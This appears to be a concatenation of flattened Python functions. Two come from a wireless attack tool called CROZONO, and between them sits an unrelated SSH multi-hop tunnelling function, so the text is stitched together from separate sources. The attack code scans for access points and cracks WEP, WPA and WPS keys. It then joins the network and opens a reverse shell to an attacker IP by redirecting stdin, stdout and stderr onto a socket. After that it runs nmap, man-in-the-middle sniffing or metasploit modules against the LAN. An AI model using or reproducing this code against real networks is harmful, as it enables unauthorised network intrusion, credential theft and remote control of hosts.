wps_module in wps_modules: attack = import_module(wps_module[0]) if attack.check(): attack.setup() attack.run() if settings.TARGET_KEY is not None: info("Key found!: {k} ".format( k=settings.TARGET_KEY)) break else: pass if settings.TARGET_KEY is None: if wps: warn( "PIN not found! :-( Running WPA/WPA2 attack modules..." ) wpa_modules = find_modules('wpa') for wpa_module in wpa_modules: attack = import_module(wpa_module[0]) if attack.check(): attack.setup() attack.run() if settings.TARGET_KEY is not None: info("Key found!: {k} ".format( k=settings.TARGET_KEY)) break else: pass if settings.TARGET_KEY is None: # still... error("Key not found! :-(") exit(0) else: lan_mgr.save_key() lan_mgr.connect_to_lan() else: info("Open network!") lan_mgr.connect_to_lan() # -------------------- Acquired LAN range -------------------------------------------- lan_mgr.lan_range() lan_mgr.get_gateway() # -------------------- Connect to attacker and relay network info -------------------- if settings.IP_ATTACKER is not None: info( "Sending information about network to attacker ({ip}) and running attacks..." .format(ip=settings.IP_ATTACKER)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((settings.IP_ATTACKER, settings.PORT_ATTACKER)) os.dup2(s.fileno(), 0) os.dup2(s.fileno(), 1) os.dup2(s.fileno(), 2) banner() info("Hello! :)") if settings.LAN_DISCOVERY is not None: discovery = import_module(settings.LAN_DISCOVERY) if discovery.check(): discovery.setup() discovery.run() else: warn("Error to run LAN discovery module!") else: warn("Attacker not defined! Ending...") exit(0) # -------------------- LAN Attacks -------------------------------------------------- if settings.ATTACK is not None: attack = import_module(settings.ATTACK) if attack.check(): attack.setup() attack.run() else: error("Error to run LAN attack module! Ending...") exit(1) else: warn("Attack not defined!") s.shutdown(1) info("CROZONO has finished! Good bye! ;)")
def main(): global session global logging global disconnection_timeout c = args.config log.info('Using: {}'.format(os.path.join(os.path.dirname(os.path.abspath(c)), c))) with open(c) as f: config = yaml.load(f) logging = config.get('logging') tunnels = config.get('tunnels') all_tunnels = [] [all_tunnels.append(Tunnel(t)) for t in tunnels] hops = config.get('hops') for i, hop in enumerate(hops): pid_stack = [] key = list(hop.keys())[0] h = hop[key] hop = Hop(key, h, i) tunnels = [] if hop.key_auth: if hop.index == len(hops) - 1: [tunnels.append(each.mapping) for each in all_tunnels] else: for tun in all_tunnels: tunnels.append(tun.get_localhost_mapping()) p = connect_with_key(hop.host, hop.user, hop.auth, tunnels) pid_stack.append(p) else: if hop.index == len(hops) - 1: [tunnels.append(each.mapping) for each in all_tunnels] else: for tun in all_tunnels: tunnels.append(tun.get_localhost_mapping()) p = connect_with_password(hop.host, hop.user, hop.auth, tunnels) pid_stack.append(p) session.sendline('while [ 1=1 ]; do echo \'keepalive\' ; sleep 3 ; done') log.info('Tunneling done:') [log.info(t) for t in all_tunnels] # TODO: Watch for broken pipe? try: input("Press ENTER to disconnect") print() except KeyboardInterrupt: log.error('Getting out of here!') disconnection_timeout = 0 for h in reversed(hops): alias = list(h.keys())[0] log.info("Disconnecting from {}".format(alias)) try: r = logout(disconnection_timeout) except KeyboardInterrupt: log.warn("Hurrying up.") r = None disconnection_timeout = 0 if r: log.info('Disconnected') else: log.warn('Connection forcefully closed') try: os.kill(pid_stack[0], signal.SIGKILL) log.warn('Killed off remaining SSH process') except ProcessLookupError: pass log.info('Done')
def main(): banner() if not checks.check_root(): error('You need root privileges to run CROZONO!\n') exit(1) if not checks.check_wlan_attacks_dependencies(): exit(1) args = parse_args() info("CROZONO running...") settings.OS_PATH = os.getcwd() settings.INTERFACE = args.interface if args.interface is not None else settings.INTERFACE settings.INTERFACE = device_mgr.get_ifaces()[0] if settings.INTERFACE is None else settings.INTERFACE settings.TARGET_ESSID = args.essid if args.essid is not None else settings.TARGET_ESSID settings.TARGET_KEY = args.key if args.key is not None else settings.TARGET_KEY settings.IP_ATTACKER = args.dest if args.dest is not None else settings.IP_ATTACKER settings.ATTACK = args.attack if args.attack is not None else settings.ATTACK if settings.TARGET_ESSID is not None: if settings.TARGET_KEY is not None: ap_target = None lan_mgr.connect_to_lan() else: device_mgr.hardware_setup() ap_target = airodump.scan_targets() else: device_mgr.hardware_setup() ap_target = airodump.scan_targets() # -------------------- Infiltrate wifi -------------------- if ap_target is not None: settings.TARGET_ESSID = ap_target.get('ESSID').strip() settings.TARGET_BSSID = ap_target.get('BSSID').strip() settings.TARGET_CHANNEL = ap_target.get('channel').strip() settings.TARGET_PRIVACY = ap_target.get('Privacy').strip() info("Target selected: " + settings.TARGET_ESSID) if settings.TARGET_PRIVACY == 'WEP': from src.attacks import wep_attack info("Cracking {e} access point with WEP privacy...".format(e=settings.TARGET_ESSID)) wep_attack.run() if settings.TARGET_KEY is None: error("Key not found! :(") exit() else: info("Key found!: {k} ".format(k=settings.TARGET_KEY)) lan_mgr.save_key() lan_mgr.connect_to_lan() elif settings.TARGET_PRIVACY == 'WPA' or settings.TARGET_PRIVACY == 'WPA2' or settings.TARGET_PRIVACY == 'WPA2 WPA': from src.attacks import wpa_attack,wps_attack info("Cracking {e} access point with {p} privacy...".format(e=settings.TARGET_ESSID, p=settings.TARGET_PRIVACY)) wps = wps_attack.check() if wps: info("WPS is enabled") wps_attack.pixiedust() if settings.TARGET_KEY is None: warn("PIN not found! Trying with conventional WPA attack...") wpa_attack.run() else: warn("WPS is not enabled") wpa_attack.run() if settings.TARGET_KEY is None: error("Key not found! :(") exit(1) else: info("Key found!: {k} ".format(k=settings.TARGET_KEY)) lan_mgr.save_key() lan_mgr.connect_to_lan() else: info("Open network!") lan_mgr.connect_to_lan() # -------------------- Acquired LAN range ----------------------------------------- lan_mgr.lan_range() lan_mgr.get_gateway() # -------------------- Connect to attacker and relay NMap info -------------------- if os.path.exists(settings.OS_PATH + '/cr0z0n0_nmap'): os.remove(settings.OS_PATH + '/cr0z0n0_nmap') if not checks.check_lan_attacks_dependencies(): exit(1) if settings.IP_ATTACKER is not None: info("Sending information about network to attacker ({ip}) and running attacks...".format(ip=settings.IP_ATTACKER)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((settings.IP_ATTACKER, settings.PORT_ATTACKER)) os.dup2(s.fileno(), 0) os.dup2(s.fileno(), 1) os.dup2(s.fileno(), 2) banner() info("Hello! :)") info("Executing Nmap...") subprocess.call(['nmap', '-O', '-sV', '-oN', 'cr0z0n0_nmap', '--exclude', settings.IP_LAN, settings.LAN_RANGE], stderr=subprocess.DEVNULL) else: warn("Attacker not defined! Ending up...") exit() # -------------------- Attacks -------------------- if settings.ATTACK == 'sniffing-mitm': from src.attacks import sniffing_mitm sniffing_mitm.run() elif settings.ATTACK == 'metasploit': from src.attacks import metasploit metasploit.run() else: warn("Attack not defined!") s.shutdown(1) info("CROZONO has finished! Good bye! ;)")